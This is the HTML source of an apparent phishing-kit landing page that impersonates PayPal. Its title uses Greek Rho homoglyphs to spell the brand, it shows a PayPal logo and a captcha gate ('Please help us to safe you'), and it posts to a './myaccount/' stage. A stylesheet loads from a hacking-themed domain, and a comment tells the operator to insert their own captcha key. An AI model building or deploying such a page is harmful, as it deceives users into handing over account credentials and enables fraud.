
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<link rel="stylesheet" href="http://tools-teen-hack.info/ok.css" />
<title>&Rho;ay&Rho;al: Solve Captcha to continue</title>
<link rel="icon" href="http://img110.xooimage.com/views/e/1/5/icon-4da6a8f.png/">
<script src='https://www.google.com/recaptcha/api.js'></script>
</head>
<style>
body { 
background-image: url("https://www.solidbackgrounds.com/images/950x350/950x350-white-solid-color-background.jpg");
background-repeat: no-repeat;
background-size:100% 100%;
background-attachment:fixed;
}



</style>
<center> <img style="margin-top:150px;" src="http://www.stickpng.com/assets/images/580b57fcd9996e24bc43c530.png"  class="center" width="600px" height="130px"></center>
<center>
<br>

<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.1.1/jquery.min.js"></script> 
<script>
$(document).ready(function(){
 $("form").submit(function(){
   var response = grecaptcha.getResponse();
      if(response.length == 0){
          alert('Please check the Captcha');
    return false;
 } 
 });
});
</script>
 <script type="text/javascript">
 var onloadCallback = function() {
 grecaptcha.render('html_element', {
 'sitekey' : '6.TEST.UAAAAAMZoq8xvm_SH33NZ0.DJ' // Please Edit your Captcha API Key 6.TEST.UAAAAAMZoq8xvm_SH33NZ0.DJ
 });
 };
 </script>
 
</head>
<body>
   <form action="./myaccount/" method="post">
   <div id="html_element"></div>
       
	   
 <b><i>Please complete the captcha to continue.</i></b>
 <b><i>Please help us to safe you</i></b>
<br>
       <button class="button actionContinue scTrack:unifiedlogin-login-submit" type="submit" id="btnLogin" name="btnLogin" value="Login" pa-tracked="1">Continue</button>
   </form> 
 <script src="https://www.google.com/recaptcha/api.js?onload=onloadCallback&render=explicit"
 async defer>
 </script>
</body>
 
</html>